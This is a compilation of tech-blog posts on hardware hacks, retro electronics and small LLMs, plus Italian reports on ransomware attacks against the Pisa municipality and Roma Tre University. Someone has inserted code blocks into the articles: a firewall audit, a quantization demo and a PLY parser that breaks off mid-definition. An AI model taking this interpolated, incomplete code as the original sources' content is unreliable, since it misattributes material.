Plain washers have a surprising number of secondary functions. Spring washers, including Belleville washers, help prevent fasteners from loosening over time. Wave washers look — well — wavy. They provide precise force against the bolt for preloading. Locking washers are also made to prevent fasteners from loosening, but use teeth or stops instead of springs.
There are plenty of standards, of course, that mostly match up. Mostly.
If you like knowing about odd washers, you might also want to know about the bolts that pass through them.
youtube.com/embed/F4EvMVpx1Pw?…
Artificial intelligence, emotional intelligence: future simple or imperfect?
“Artificial intelligence, emotional intelligence: future simple or imperfect?” is the theme of the conference scheduled for Saturday 10 May 2025 at 9:00 in the aula magna of the law faculty at Palazzo Cavallini, via San Faustino 41, Brescia. Speakers: Francesco Morace, Cosimo Accoto, Arturo Di Corinto, Daniele Monteleone, Nicoletta Cusano, Salvatore Frattallone. Moderators: Teresa Croce and Luigi Della Bora; introduction by Prof. Maurizio Tira. The initiative is held under the aegis of Lions, Leo, Fondazione Lions Clubs Distretto 108 Ib2 “Bruno Bnà” Ets, Comune di Brescia, Università degli Studi di Brescia and Fondazione UniBS.
Rebooting A 1973 Art Installation Running On A Nova
Electronics-based art installations are often fleeting and specific things that only a select few people who are in the right place or time get to experience before they are lost to the ravages of ‘progress.’ So it’s wonderful to find a dedicated son who has recreated his father’s 1973 art installation, showing it to the world in a miniature form. The network-iv-rebooted project is a recreation of an installation once housed within a departure lounge in terminal C of Seattle-Tacoma airport.
You can do a lot with a ‘pi and a fistful of Teensies!
The original unit comprises an array of 1024 GE R6A neon lamps, controlled from a Data General Nova 1210 minicomputer. A bank of three analog synthesizers also drove into no fewer than 32 resonators. An 8×8 array of input switches was the only user-facing input. The switches were mounted to a floor-standing pedestal facing the display.
For the re-creation, the neon lamps were replaced with 16×16 WS2811 LED modules, driven via a Teensy 4.0 using the OctoWS2811 library. The display Teensy is controlled from a Raspberry Pi 4, hooked up as a virtual serial device over USB. A second Teensy (you can’t have too many Teensies!) is responsible for scanning a miniature 8×8 push button array as well as running a simulation of the original sound synthesis setup. Audio is pushed out of the Teensy using a PT8211 I2S audio DAC, before driving a final audio power amp.
Attempting to reproduce accurately how the original code worked would be tricky, if not downright impossible, but fear not, as network-iv-rebooted is running the original code. Since the artist was astute enough to keep not only the engineering drawings and schematics, but also the original paper tape of the Nova 1210 program, it could be successfully run using the SIMH Nova emulator. The simulator needed to be modified to support the optional ‘device 76’ GPIO device added to the Nova 1210 for handling the extra connectivity. This was a small price to pay compared to the alternative. That said, most of the heavy lifting on the I/O side is performed by the pair of Teensies, with modern coding methods making life a lot easier.
Mechanics and code for the reproduction are being collected on this GitHub repo for those interested in building a clone. The opu20 page has a few photos and details of the original installation, but many more pieces can be found on the sculptures page, complete with a neat video tour, which we also include below. Check out those circuit sculptures! Groovy!
We’ve recently featured some retro electronic art, drooled over some circuit sculptures, and swooned at some PCB art. We just can’t get enough!
youtube.com/embed/5fbXEzOQV64?…
A short video about James Seawright’s other pieces:
youtube.com/embed/oJcmmd8Rodw?…
Simulating Cable TV
[Wrongdog Recons] suffers from a severe case of nostalgia. His earlier project simulated broadcast TV, and he was a little surprised at how popular the project was on GitHub. As people requested features, he realized that he could create a simulated cable box and emulate a 1990s-era cable TV system. Of course, you also needed a physical box, which turned into another project. You can see more about the project in the video below.
Inside is, unsurprisingly, a Raspberry Pi. Then you have to pretend to be a cable TV scheduler and organize your different video files for channels. You can interleave commercials and station breaks.
One addition was a scheduler, so you can set things like football games to play only during football season. You can also control timing so you don’t get beer commercials during Saturday morning cartoons.
We were especially impressed with the program guide channel that lets you see what’s playing, just like an old-style cable system. The simulation even plays trash TV in the morning and bizarre commercials post-midnight.
If you are tired of having to decide what to watch, this might be for you. If you want to simulate the earliest pay TV, you’ll need a coin slot. We wonder if the simulator could do a local origination weather channel.
youtube.com/embed/CDW1wokbRiQ?…
Reading the color of money
Ever wondered what happens when you insert a bill into a vending machine? [Janne] is back with his latest project: reverse engineering a banknote validator. Curious about how these common devices work, he searched for information but found few resources explaining their operation.
To learn more, [Janne] explored the security features that protect banknotes from counterfeiting. These can include microprinting, UV and IR inks, holograms, color-shifting coatings, watermarks, magnetic stripes, and specialty paper. These features not only deter fraud but also enable validators to quickly verify a bill’s authenticity.
[Janne] purchased several banknote validators to disassemble and compare. Despite varied exteriors, their core mechanisms were similar: systems to move the bill smoothly, a tape head to detect magnetic ink or security strips, and optical sensors to inspect visible, UV, and IR features. By reverse engineering the firmware of two devices, he uncovered their inner workings. They run a calibration procedure to normalize their readings, then analyze a bill through a sophisticated signal-processing pipeline. If the data falls within a narrow acceptance range, the device authenticates the bill; otherwise, it rejects it.
Head over to his site to check out all the details he discovered while exploring these devices, as well as the other cool projects he’s worked on in the past. Reverse engineering offers a unique window into technology. Check out other projects we’ve featured showcasing this skill.
Hackaday Links: May 11, 2025
Did artificial intelligence just jump the shark? Maybe so, and it came from the legal world of all places, with this report of an AI-generated victim impact statement. In an apparent first, the family of an Arizona man killed in a road rage incident in 2021 used AI to bring the victim back to life to testify during the sentencing phase of his killer’s trial. The video was created by the sister and brother-in-law of the 37-year-old victim using old photos and videos, and was quite well done, despite the normal uncanny valley stuff around lip-syncing that seems to be the fatal flaw for every deep-fake video we’ve seen so far. The victim’s beard is also strangely immobile, which we found off-putting.
In the video, the victim expresses forgiveness toward his killer and addresses his family members directly, talking about things like what he would have looked like if he’d gotten the chance to grow old. That seemed incredibly inflammatory to us, but according to Arizona law, victims and their families get to say pretty much whatever they want in their impact statements. While this appears to be legal, we wouldn’t be surprised to see it appealed, since the judge tacked an extra year onto the killer’s sentence over what the prosecution sought based on the power of the AI statement. If this tactic withstands the legal tests it’ll no doubt face, we could see an entire industry built around this concept.
Last week, we warned about the impending return of Kosmos 482, a Soviet probe that was supposed to go to Venus when it was launched in 1972. It never quite chooched, though, and ended up circling the Earth for the last 53 years. The satellite made its final orbit on Saturday morning, ending up in the drink in the Indian Ocean, far from land. Alas, the faint hope that it would have a soft landing thanks to the probe’s parachute having apparently been deployed at some point in the last five decades didn’t come to pass. That’s a bit of a disappointment to space fans, who’d love to get a peek inside this priceless bit of space memorabilia. Roscosmos says they monitored the descent, so presumably they know more or less where the debris rests. Whether it’s worth an expedition to retrieve it remains to be seen.
Are we really at the point where we have to worry about counterfeit thermal paste? Apparently, yes, judging by the effort Arctic Cooling is putting into authenticity verification of its MX brand pastes. To make sure you’re getting the real deal, boxes will come with seals that rival those found on over-the-counter medications and scratch-off QR codes that can be scanned and cross-referenced to an online authentication site. We suppose it makes sense; chip counterfeiting is a very real thing, after all, and it’s probably as easy to put a random glob of goo into a syringe as it is to laser new markings onto a chip package. And Arctic compound commands a pretty penny, so the incentive is obvious. But still, something about this just bothers us.
Another very cool astrophotography shot this week, this time a breathtaking collection of galaxies. Taken from the Near Infrared camera on the James Webb Space Telescope with help from the Hubble Space Telescope and the XMM-Newton X-ray space observatory, the image shows thousands of galaxies of all shapes and sizes, along with the background X-ray glow emitted by all the clouds of superheated dust and gas between them. The stars with the characteristic six-pointed diffraction spikes are all located within our galaxy, but everything else is a galaxy. The variety is fascinating, and the scale of the image is mind-boggling. It’s galactic eye candy!
And finally, if you’ve ever wondered about what happens when a nuclear reactor melts down, you’re in luck with this interesting animagraphic on the process. It’s not a detailed 3D render of any particular nuclear power plant and doesn’t have a specific meltdown event in mind, although it does mention both Chernobyl and Fukushima. Rather, it’s a general look at pressurized water reactors and what can go wrong when the cooling water stops flowing. It also touches on potentially safer designs with passive safety systems that rely on natural convection to keep cooling water circulating in the event of disaster, along with gravity-fed deluge systems to cool the containment vessel if things get out of hand. It’s a good overview of how reactors work and where they can go wrong. Enjoy.
youtube.com/embed/hJW11Yg09M8?…
Open Source ELINT Accidentally from NASA
You normally think of ELINT — Electronic Intelligence — as something done in secret by shadowy three-letter agencies or the military. The term usually means gathering intelligence from signals that don’t contain speech (since that’s COMINT). But [Nukes] was looking at public data from NASA’s SMAP satellite and made an interesting discovery. Despite the satellite’s mission to measure soil moisture, it also provided data on strange happenings in the radio spectrum.
While 1.4 GHz is technically in the L-band, it is reserved (from 1.400–1.427 GHz) for specialized purposes. The frequency is critical for radio astronomy, so it is typically clear, apart from low-power safety-critical data systems that benefit from the low potential for interference. SMAP, coincidentally, listens on 1.41 GHz and maps where there is interference.
Since there aren’t supposed to be any high-power transmitters at that frequency, you can imagine that anything showing up there is probably something unusual and interesting. In particular, it is often a signature for military jamming since nearby frequencies are often used for passive radar and to control drones. So looking at the data can give you a window on geopolitics at any given moment.
The data is out there, and a simple Python script can pull it. We imagine this is the kind of data that only a spook in a SCIF would have had just a decade or two ago.
Jamming tech is secretive but powerful. SMAP isn’t the only satellite to have its mission unexpectedly repurposed.
The criminal hackers of Nova claim a cyber attack on the Comune di Pisa
The NOVA cybercrime gang claims, on its Data Leak Site (DLS), a cyber attack on the Comune di Pisa.
Disclaimer: This report includes screenshots and/or text taken from publicly accessible sources. The information provided is exclusively for threat intelligence and cybersecurity risk awareness purposes. Red Hot Cyber condemns any unauthorized access, improper dissemination or illicit use of such data. At present it is not possible to independently verify the authenticity of the reported information, since the organization involved has not yet released an official statement on its website. Consequently, this article should be considered exclusively for informational and intelligence purposes.
The post published in the underground by the cybercriminals states that the gang is in possession of 100GB of data exfiltrated from the municipality's IT infrastructure. They threaten to publish it in 14 days.
On that date the post will be updated. The gang will most likely publish part of the data in its possession on that date to increase pressure on the victim.
To attest that access to the IT infrastructure was successful, the cybercriminals post a series of documents (samples) belonging to the victim organization.
This way of operating, as RHC readers know, generally occurs when no agreement has yet been reached on paying the ransom demanded by the cybercriminals. By threatening to publish the data in their possession, the criminals increase pressure on the breached organization, hoping that payment will happen faster.
As we often report, access to the Darknet is feasible for anyone who can use a PC normally. This is important to underline, because many claim the opposite, often in press releases issued after ransomware gangs publish data, and such information is publicly consultable as open source.
As is our custom, we always leave room for a statement from the organization should it wish to give us updates on the matter. We will be glad to publish such information in a dedicated article giving the matter prominence.
RHC will monitor the evolution of the matter so as to publish further news on the blog should there be substantial developments. Anyone with knowledge of the facts who wishes to provide information anonymously can use the whistleblower's encrypted email.
What is ransomware as a service (RaaS)
Ransomware is a type of malware that is introduced into an organization to encrypt data and make systems unavailable. Once the data is encrypted, the criminals demand that the victim pay a ransom, in cryptocurrency, to decrypt it.
If the victim does not want to pay the ransom, the criminals proceed with double extortion, that is, the threat of publishing sensitive data previously exfiltrated from the victim's IT infrastructure.
To better understand how criminal organizations operate within the ransomware as a service (RaaS) business, we refer you to these articles:
- What ransomware is. Discovering how RaaS works
- Why Italy is third in ransomware attacks
- Difficulty of attributing a cyber attack, and false flags
- Discovering the LockBit 2.0 ransomware group
- Interview with the representative of LockBit 2.0
- 2021 was a difficult year for cyber incidents
- Discovering the Darkside ransomware group
- Interview with REvil's spokesperson UNKNOWN, on the XSS forum
- Interview with BlackMatter's spokesperson
How to protect yourself from ransomware
Ransomware infections can be devastating for an organization, and data recovery can be a difficult and laborious process requiring highly specialized operators for reliable recovery; in the absence of a data backup, recovery has frequently been unsuccessful.
Users and administrators are therefore advised to adopt preventive security measures to protect their networks from ransomware infections; in order of complexity they are:
- Train staff through awareness courses;
- Use a backup and recovery plan for all critical information. Perform and test regular backups to limit the impact of data or system loss and to speed up the recovery process. Keep in mind that network-connected backups can also be affected by ransomware. Critical backups must be isolated from the network for optimal protection;
- Keep the operating system and all software up to date with the latest patches. Vulnerable applications and operating systems are the target of most attacks. Ensuring these are patched with the latest updates greatly reduces the number of exploitable entry points available to an attacker;
- Keep antivirus software up to date and scan all software downloaded from the Internet before running it;
- Limit users' ability (permissions) to install and run unwanted software applications and apply the principle of “least privilege” to all systems and services. Limiting these privileges can prevent malware from running or limit its ability to spread across the network;
- Avoid enabling macros from email attachments. If a user opens the attachment and enables macros, the embedded code will run the malware on the computer;
- Do not follow unsolicited web links in emails;
- Never expose Remote Desktop Protocol (RDP) connections directly to the Internet. If access from the Internet is needed, it must be mediated by a VPN;
- Implement Intrusion Prevention System (IPS) and Web Application Firewall (WAF) systems as perimeter protection in front of services exposed to the Internet;
- Implement a natively automated XDR security platform, possibly supported by a 24/7 MDR service, enabling complete and effective protection and visibility across endpoints, users, networks and applications, regardless of resources, team size or skills, and also providing automated detection, correlation, analysis and response.
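As an added example (not from the RHC article), here is a small Python audit that applies the RDP rule above to a constructed firewall rule set under first-match semantics: the weak set allows TCP 3389 from anywhere, the hardened set allows it only from an assumed VPN client pool. The rule format, the rule names and the VPN pool 10.8.0.0/24 are assumptions, not taken from any real product or from the article.

```python
"""Audit a constructed firewall rule set for RDP (TCP 3389) reachable directly
from the Internet instead of only through a VPN. Rule format, names and the
VPN pool are assumptions made for this example."""
import ipaddress
from dataclasses import dataclass
from typing import Optional

RDP_PORT = 3389
# Assumed VPN client pool (placeholder range, not from the article).
VPN_POOL = ipaddress.ip_network("10.8.0.0/24")
# TEST-NET-3 address standing in for "an arbitrary host on the Internet".
INTERNET_PROBE_IP = "203.0.113.10"


@dataclass(frozen=True)
class Rule:
    name: str
    action: str               # "allow" or "deny"
    proto: str                # "tcp", "udp" or "any"
    dst_port: Optional[int]   # None means any port
    src: str                  # source CIDR


def rule_matches(rule: Rule, proto: str, dst_port: int, src_ip) -> bool:
    """A rule matches when protocol, destination port and source all fit."""
    if rule.proto not in ("any", proto):
        return False
    if rule.dst_port not in (None, dst_port):
        return False
    return src_ip in ipaddress.ip_network(rule.src, strict=False)


def decide(rules: list, proto: str, dst_port: int, src_ip) -> Optional[Rule]:
    """First-match semantics: return the first matching rule, or None for the
    implicit default deny."""
    src_ip = ipaddress.ip_address(str(src_ip))
    for rule in rules:
        if rule_matches(rule, proto, dst_port, src_ip):
            return rule
    return None


def audit_rdp_exposure(rules: list) -> list:
    """Return findings; an empty list means RDP is reachable only via the VPN pool
    (or not at all)."""
    findings = []
    hit = decide(rules, "tcp", RDP_PORT, INTERNET_PROBE_IP)
    if hit is not None and hit.action == "allow":
        findings.append(
            f"RDP reachable directly from the Internet via rule '{hit.name}'")
    return findings


# Constructed rule sets: the weak one is the mistake the article warns about.
WEAK_RULES = [
    Rule("allow-rdp-any", "allow", "tcp", RDP_PORT, "0.0.0.0/0"),
    Rule("default-deny", "deny", "any", None, "0.0.0.0/0"),
]
HARDENED_RULES = [
    Rule("allow-rdp-vpn", "allow", "tcp", RDP_PORT, str(VPN_POOL)),
    Rule("deny-rdp-rest", "deny", "tcp", RDP_PORT, "0.0.0.0/0"),
    Rule("default-deny", "deny", "any", None, "0.0.0.0/0"),
]

if __name__ == "__main__":
    for label, rules in (("weak", WEAK_RULES), ("hardened", HARDENED_RULES)):
        print(label, audit_rdp_exposure(rules) or ["ok: RDP only via VPN"])
```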
Both individuals and organizations are discouraged from paying the ransom, since even after payment the cyber gangs may not release the decryption key, or the recovery operations may suffer errors and inconsistencies.
Cybersecurity is a serious matter and today it can profoundly undermine a company's business.
Today the mindset must change immediately: cybersecurity must be treated as an integral part of the business, not something to think about only after a cybersecurity incident has occurred.
The article “The criminal hackers of Nova claim a cyber attack on the Comune di Pisa” comes from il blog della sicurezza informatica.
Cyber attack on Università Roma Tre: ACN and Polizia Postale intervene
A serious cyber attack hit the University's digital infrastructure on the night between 8 and 9 May, causing the sudden interruption of the University's online services, including institutional websites and essential platforms for students and teaching staff.
At the moment the university's site displays the following notice, with the institutional site taken offline.
According to what the University itself reported in an official communication, the first alarm went off on the night of 8 May, when IT services suddenly stopped working. Already during the night, the Area Sistemi Informativi activated its emergency protocols, alerting the Agenzia per la Cybersicurezza Nazionale (ACN) and the Polizia Postale, who went on site to investigate.
Analysis and containment operations continued until 2:00 the following morning, making it possible to confirm the severity of the attack and to begin an initial assessment of the damage to the digital infrastructure.
Direzione 5 and Direzione 7, together with the University's IT technicians, are working on the full restoration of the platforms, with the declared goal of bringing the main services back online by Monday.
Among the priority systems:
- Accounting
- Electronic records (protocollo informatico)
- IRIS (research archive)
- Student registry (GOMP)
The GOMP platform, essential for students and lecturers, has been accessible again since the evening of 9 May.
While difficulties persist on some fronts, institutional email is fully functional. Users can access it with their credentials in the formats nome.cognome@stud.uniroma3.it (for students) and ncognome@os.uniroma3.it (for staff). The University has promised continuous updates on the evolution of the situation and on restoration times through its official channels.
Cyber attack on the University's infrastructure
On the night of 8 May, an interruption of the University's IT services was recorded. Following verification operations carried out during the night and continued throughout the morning of the 9th, it was established that the University's infrastructure was the subject of a serious cyber attack that rendered the University's websites inaccessible.
Immediately after detecting the attack, the Area Sistemi Informativi contacted the Agenzia per la Cybersicurezza Nazionale and the Polizia Postale, who promptly came to our premises to activate all the necessary actions. These procedures continued until 02:00 last night and were essential to understand the extent of the attack, assess the damage and begin the recovery process.
Direzione 5 and Direzione 7 are working even at this hour to ensure the restoration of the main services by Monday.
Among these, particular attention has been paid to the accounting, electronic records, Iris and student registry services, which are essential for the University's administrative management. The work carried out has allowed students and lecturers access to the registry services (GOMP) since the evening of the 9th.
We apologize for the inconvenience; the entire IT technical sector is engaged in the restoration, and communications on the progress of service reactivation will follow.
University email is working; to access it, click here and enter credentials of the form mrossi@os.uniroma3.it or mar.rossi@stud.uniroma3.it.
As is our custom, we leave room for a statement from the organization should it wish to give us updates on this matter, and we will be glad to publish it in a dedicated article giving the matter prominence.
RHC will monitor the evolution of the matter so as to publish further news on the blog should there be substantial developments. Anyone with knowledge of the facts who wishes to provide information anonymously can use the whistleblower's encrypted email.
The article “Cyber attack on Università Roma Tre: ACN and Polizia Postale intervene” comes from il blog della sicurezza informatica.
Learn 15 Print-in-Place Mechanisms in 15 Minutes
3D printed in-place mechanisms and flexures, such as living hinges, are really neat when you can get them to print correctly. But how do you actually do that? YouTuber [Slant 3D] is here with a helpful video demonstrating the different kinds of springs and hinges (Video, embedded below) that can be printed reliably, and discusses some common pitfalls and areas to concentrate upon.
Living hinges are everywhere and have been used at least as long as humans have been around. The principle is simple enough; join two sections to move with a thinned section of material that, in small sections, is flexible enough to distort a few times without breaking off. The key section is “a few times”, as all materials will eventually fail due to overworking. However, if this thing is just a cheap plastic case around a low-cost product, that may not be a huge concern. The video shows a few ways to extend flexibility, such as spreading the bending load across multiple flexure elements to reduce the wear of individual parts, but that comes at the cost of compactness.
Moving on from springs, the second part of the video describes a few strategies for print-in-place hinges, how they fail, and what to do to mitigate that. Again, robustness comes at a cost, in this case increased bulk, but with 3D printing, you get what you pay for. Overall, it’s a nice, concise guide to the topic and well worth a mere seventeen minutes of your time, we reckon.
We see 3D printed flexure mechanisms a lot ’round here, like this for example. But how precise are they? Finally, we think this 3D printed spherical flexure joystick is cool, but must have been a bit tricky to model!
youtube.com/embed/AAKsl8zW-Ds?…
Thanks to [Hari Wiguna] for the tip!
Exploring the RP2350’s UART-Bootloader
The RP2350 has a few advantages over its predecessor, one of which is the ability to load firmware remotely via UART, as [Thomas Pfilser] has documented on his blog and in the video below.
[Thomas] had a project that needed more PWM than the RP2350 could provide, and hit upon the idea of using a second RP2350 as a port expander. Now, one could hard-code this, but dealing with two sets of firmware on one board can be annoying. That’s where the UART bootloader comes in: it will allow [Thomas] to program the port-expander RP2350 using the main microcontroller. Thus he only has to worry about one firmware, speeding up development.
There are limits to this technique: for one, your code must fit into the RP2350’s RAM, but the chip has 512 kB. While 640 kB should be enough for anyone, 512 kB is plenty for the port-expander [Thomas] is working on. The second drawback is that your device now has a boot time of a second or so, since the UART connection is not exactly high-bandwidth. Third, using UART on the same pins as the bootloader within the program is a bit tricky, though [Thomas] found a solution that may soon be in the SDK.
[Thomas] also wanted to be able to perform this trick remotely, which isn’t exactly UART’s forte. RS-485 comes to the rescue, via TI’s THVD1450. That worked reliably at the 10m cable length used for the test. [Thomas] sees no reason it could not work over much longer distances. ([Thomas] suggests up to 100 m, but the baud rate is fairly low, so we wouldn’t be surprised if you could push it quite a bit further than that. The standard is good out to a kilometer, after all.) For all the wrinkles and links to tips and solutions, plus of course [Thomas]’s code, check out the blog. If you want to listen to the information, you can check out the video below.
We’re grateful to [Thomas] for letting us know about his project via the tip line, like we are to everyone who drops us a tip. Hint, hint.
Given that it is the new chip on the block, we haven’t seen too many hacks with the RP2350 yet, but they’re starting to trickle in. While a UART bootloader is a nice feature to have, it can also introduce a security risk, which is always something to keep in mind.
youtube.com/embed/eno0hiFSr18?…
Tearing Down a Forgotten Video Game
Remember Video Volley? No? We don’t either. It looks like it was a very early video game console that could play tennis, hockey, or handball. In this video, [James] tears one apart. If you are like us, we are guessing there will be little more than one of those General Instrument video game chips inside.
These don’t look like they were mass-produced. The case looks like something off the shelf from those days. The whole thing looks more like a nice homebrew project or a pretty good prototype. Not like something you’d buy in a store.
Even inside, the wiring looks decidedly hand-built. The cheap phenolic PCB contained a surprise. The box does have a dedicated “pong” chip. But it isn’t from General Instruments! It’s a National Semiconductor chip instead.
The controllers are little more than sliding potentiometers in a box with a switch. We wonder how many of these were made and what they sold for new. If you know anything, let us know in the comments.
We still see the occasional project around a General Instruments chip. If you really want a challenge for a homebrew pong, ditch the pong chip and all the other ICs, too. If you want to read more about the history of the pong chip, you’ll probably enjoy this blog post from [pong-story].
youtube.com/embed/fi-0FPcjCl8?…
Boxie – a Gameboy-Esque Audio Player
This little audiobook player is a stellar example of the learning process behind a multifaceted project blending mechanical, electrical, and software design. [Mario] designed this audiobook player, dubbed Boxie, for his 3-year-old son to replace the often-used but flawed Toniebox.
The inspiration for Boxie was the Toniebox, a kid-friendly audiobook player. While functional, the Toniebox had drawbacks: it required internet connectivity, limited media selection, and had unreliable controls. Enter Boxie, a custom-built, standalone audiobook player free from web services, designed to address these issues with superior audio quality and toddler-friendly controls.
Boxie’s media is stored on microSD cards inserted into a slot on the device. To make this manageable for a toddler, he designed a PCB with a standard microSD card interface, ensuring easy swapping of audiobooks. The enclosure, crafted via 3D printing, is durable and compact, tailored for small hands.
The cartridges slide into the body of the Boxie. This presented a problem: most cartridge media use edge connectors, and strictly speaking his DIY cartridges didn’t have those, so they couldn’t use traditional cartridge reader components. He first tried pogo pins, but ran into several issues, most notably that they could not hold up to the wear and tear of a 3-year-old. A clever hack that added robustness was switching to a series of battery springs to interface with the cartridge.
Inside the Boxie lives an ESP32-S3 microcontroller, which provides the smarts to read all the controls and play audio from the inserted cartridge. The main housing also contains the battery, DAC, amp, and speaker. [Mario] faced a fair number of new challenges on this project, including designing a battery charging circuit and building his own ESP32-S3 board with support for charging NiMH batteries.
All of the 3D designs, PCB files, and source code are available on his GitHub account. If you’re interested in making a Boxie for a young one in your life, be sure to go check out his detailed write-up. If you enjoyed this project, be sure to check out the other DIY audio players we’ve featured.
Another Old ThinkPad Gets A New Motherboard
The Thinkpad line of laptops, originally from IBM, and then from Lenovo, have long been the choice of many in our community. They offer a level of robustness and reliability missing in many cheaper machines. You may not be surprised to find that this article is being written on one. With such a following, it’s not surprising that a significant effort has gone into upgrading older models. For example, we have [Franck Deng]’s new motherboard for the Thinkpad X200 and X201. These models from the end of the 2000s shipped as far as we can remember with Core 2 Duo processors, so we can imagine they would be starting to feel their age.
It’s fair to say the new board isn’t a cheap option, but it does come with a new Core Ultra 7 CPU, DDR5 memory, M.2 interfaces for SSDs alongside the original 2.5″ device, and USB-C with Thunderbolt support. There are a range of screen upgrade options. For an even more hefty price, you can buy a completely rebuilt laptop featuring the new board. We’re impressed with the work, but we have to wonder how it would stack up against a newer Thinkpad for the price.
If you’re curious to see more of the same, this isn’t the first such upgrade we’ve seen.
Thanks [Max] for the tip.
An LLM for the Raspberry Pi
Microsoft’s latest Phi4 LLM has 14 billion parameters that require about 11 GB of storage. Can you run it on a Raspberry Pi? Get serious. However, the Phi4-mini-reasoning model is a cut-down version with “only” 3.8 billion parameters that requires 3.2 GB. That’s more realistic and, in a recent video, [Gary Explains] tells you how to add this LLM to your Raspberry Pi arsenal.
The version [Gary] uses has four-bit quantization and, as you might expect, the performance isn’t going to be stellar. For those not versed in all the LLM lingo: quantization is the precision at which the weights are stored, and, in general, the more parameters a model has, the more things it can figure out.
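As an added illustration of what “four-bit quantization” means for storage and accuracy, here is a toy implementation in Python. It is not code from [Gary]’s video or from the Phi4 model files: the block size, the 16-bit scale and the nibble packing are assumptions chosen for the example, and real formats differ in detail (they also keep some tensors at higher precision, so file sizes do not scale exactly with the bit width).

```python
from typing import List, Tuple

BLOCK = 8           # weights sharing one scale (assumed block size, not Phi4's layout)
QMIN, QMAX = -8, 7  # range of a signed 4-bit code


def quantize_4bit(weights: List[float], block: int = BLOCK) -> Tuple[List[int], List[float]]:
    """Symmetric per-block 4-bit quantization: every block of `block` weights
    shares one float scale, and each weight becomes an integer code in [-8, 7]."""
    codes: List[int] = []
    scales: List[float] = []
    for start in range(0, len(weights), block):
        chunk = weights[start:start + block]
        amax = max(abs(w) for w in chunk)
        scale = amax / QMAX if amax > 0 else 1.0  # all-zero block: any scale works
        scales.append(scale)
        for w in chunk:
            codes.append(max(QMIN, min(QMAX, int(round(w / scale)))))
    return codes, scales


def dequantize_4bit(codes: List[int], scales: List[float], block: int = BLOCK) -> List[float]:
    """Reconstruct approximate weights from codes and their block's scale."""
    return [c * scales[i // block] for i, c in enumerate(codes)]


def pack_nibbles(codes: List[int]) -> bytes:
    """Store two signed 4-bit codes per byte (low nibble first, two's complement)."""
    out = bytearray()
    for i in range(0, len(codes), 2):
        lo = codes[i] & 0xF
        hi = (codes[i + 1] & 0xF) if i + 1 < len(codes) else 0
        out.append(lo | (hi << 4))
    return bytes(out)


def unpack_nibbles(packed: bytes, n: int) -> List[int]:
    """Inverse of pack_nibbles: recover n signed codes from the byte string."""
    codes: List[int] = []
    for byte in packed:
        for nib in (byte & 0xF, byte >> 4):
            if len(codes) < n:
                codes.append(nib - 16 if nib >= 8 else nib)
    return codes


def max_abs_error(weights: List[float]) -> float:
    """Largest reconstruction error after quantize -> pack -> unpack -> dequantize."""
    codes, scales = quantize_4bit(weights)
    back = dequantize_4bit(unpack_nibbles(pack_nibbles(codes), len(codes)), scales)
    return max(abs(w - b) for w, b in zip(weights, back))


def bytes_per_weight(block: int = BLOCK, scale_bytes: int = 2) -> float:
    """Average storage per weight: 4 bits of code plus the block's shared scale
    (assumed 16-bit), compared with 2 bytes for an unquantized fp16 weight."""
    return 0.5 + scale_bytes / block


if __name__ == "__main__":
    # Constructed sample weights, one block's worth.
    sample = [0.7, -0.32, 0.14, 0.0, 0.21, -0.56, 0.07, 0.49]
    codes, scales = quantize_4bit(sample)
    print("codes:", codes, "scale:", scales[0])
    print("packed bytes:", pack_nibbles(codes).hex())
    print("max error:", max_abs_error(sample), "(bound is scale/2 =", scales[0] / 2, ")")
    print("bytes per weight:", bytes_per_weight())
```

The round-trip error is bounded by half a quantization step (scale/2), which is why the output quality of a 4-bit model degrades gracefully rather than collapsing, and why a larger block size saves space at the cost of a coarser step for the whole block.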
As a benchmark, [Gary] likes to use what he calls “the Alice question.” In other words, he asks for an answer to this question: “Alice has five brothers and she also has three sisters. How many sisters does Alice’s brother have?” While it probably took you a second to think about it, you almost certainly came up with the correct answer. With this model, a Raspberry Pi can answer it, too.
The first run seems fairly speedy, but it is running on a PC with a GPU. He notes that the same question takes about 10 minutes to pop up on a Raspberry Pi 5 with 4 cores and 8GB of RAM.
We aren’t sure what you’d do with a very slow LLM, but it does work. Let us know what you’d use it for, if anything, in the comments.
There are some other small models if you don’t like Phi4.
youtube.com/embed/kbuObvYRnWc?…
Restoring A Sinclair C5 For The Road
The Sinclair C5 was Sir Clive’s famous first venture into electric mobility, a recumbent electric-assisted tricycle which would have been hardly unusual in 2025. In 1985, though, the C5 was so far out there that it became a notorious failure. The C5 retains a huge following among enthusiasts, though, and among those is [JSON Alexander], who has bought one and restored it.
We’re treated to a teardown and frank examination of the vehicle’s strengths and weaknesses, during which we see the Sinclair brand unusually on a set of tyres, and the original motor, which is surprisingly more efficient than expected. Sir Clive may be gone, but this C5 will live again.
We’ve had the chance to road test a C5 in the past, and it’s fair to say that we can understand why such a low-down riding position was not a success back in the day. It’s unusual to see one in as original a condition as this one, it’s more usual to see a C5 that’s had a few upgrades.
Move over, Lithophane: 3D Printed 3D Photos with Gaussian Splats
If you had asked us yesterday “How do you 3D print a photo?”, we would have said “well, that’s easy, do a lithophane”, but artist, hacker and man with a very relaxing voice [Wyatt Roy] has a much more impressive answer: Gaussian splats, rendered in resin.
Gaussian splats are a 3D scanning technique aimed at replicating a visual rather than geometry, like the mesh-based 3D-scanning we usually see on Hackaday. Using photogrammetry, a point cloud is generated with an associated 3D Gaussian function describing the colour at that point. Blend these together, and you can get some very impressive photorealistic 3D environments. Of course, printing a Gaussian smear of colour isn’t trivial, which is where the hacking comes in.
14-face isospheres do a good job of replicating the complicated Gaussian, as seen with this experimental long-exposure shot.
[Wyatt] first generates the Gaussian splats with an app called Polycam, which outputs inscrutable binary .ply files. With AI assistance of dubious quality, [Wyatt] first created a Python script to decompile this data into an ASCII file, which is then fed into a Rhino script to create geometry for printing. Rather than try and replicate the Gaussian splat at each point perfectly, which would melt his PC, [Wyatt] uses 14-face isospheres to approximate the 3D Gaussian functions. These then get further postprocessing to create a printable mesh.
Printing this isn’t going to be easy for most of us, because [Wyatt] is using a multi-color DLP resin printer. The main body is clear resin, and black or white resin is used for the space defined by the isospheres created from the Gaussian splat. When the interior color is white, the effect is quite similar to those acrylic cubes you sometimes see, where a laser has etched bubbles into their depths, which makes us wonder if that might be a more accessible way to use this technique.
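An added example of the binary-to-ASCII step described above, not [Wyatt]’s script or any Polycam code: a small Python parser for binary little-endian PLY files. The sample file is constructed inline, and its property names (colour and opacity per vertex) are assumptions, since the page does not list Polycam’s. The detail worth copying when parsing scan files that came out of someone else’s app is that the element count in the header is untrusted input, so it is checked against the bytes actually present before any records are decoded or allocated.

```python
import struct
from typing import Dict, List, Tuple

# PLY scalar type names mapped to struct format codes. Gaussian-splat PLY
# files are usually binary little-endian with many float properties per vertex.
PLY_TYPES = {
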